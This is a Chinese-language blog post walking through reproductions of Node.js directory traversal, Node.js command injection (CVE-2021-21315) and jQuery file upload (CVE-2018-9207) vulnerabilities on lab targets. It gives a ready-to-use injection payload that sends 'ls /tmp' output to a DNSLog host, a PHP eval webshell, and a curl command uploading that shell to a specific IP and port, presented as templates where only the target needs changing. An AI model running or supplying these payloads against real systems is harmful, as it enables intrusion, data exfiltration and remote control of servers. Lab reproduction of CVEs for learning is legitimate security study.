框架安全&CVE复现&Django&Flask&Node.JS&JQuery

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform

获取一个url

这时候套用模板就可以了

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

直接替换上

然后访问

这个时候我们回到那个工具网站

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

然后写一个一句话木马

php 复制代码
<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

复制代码
curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

/jquery-upload-file/

相关推荐
云边云科技_云网融合9 小时前
AI 时代组网新范式:零信任软件定义组网,让连接更安全更灵活
网络·安全
Bruce_Liuxiaowei12 小时前
Windows防火墙规则导出工具:让安全配置可备份、可迁移、可审计
运维·windows·安全·网络安全
heRs BART14 小时前
【Flask】四、flask连接并操作数据库
数据库·python·flask
Y学院15 小时前
虚拟机安装ParrotOS完整教程(VMware+VirtualBox双版本)
安全·网络安全
一名优秀的码农18 小时前
vulhub系列-74-Hackable III(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
千里念行客24020 小时前
康华生物拐点已至:狂苗龙头加速转型 开启预防+治疗双轮增长新征程
大数据·科技·安全·健康医疗
金士镧(厦门)新材料有限公司20 小时前
片状碳酸镧:一种“低调但很忙”的稀土材料
科技·安全·全文检索·生活·能源
m0_7381207221 小时前
渗透基础知识ctfshow——Web应用安全与防护(第六 七章)
服务器·前端·安全
一只鼠标猴21 小时前
甲方安全运营:漏洞整改推动实操指南
运维·安全·网络安全·安全架构·安全运营·漏洞整改
DianSan_ERP21 小时前
淘宝订单接口集成中如何正确处理消费者敏感信息的安全与合规问题?
大数据·运维·网络·人工智能·安全·servlet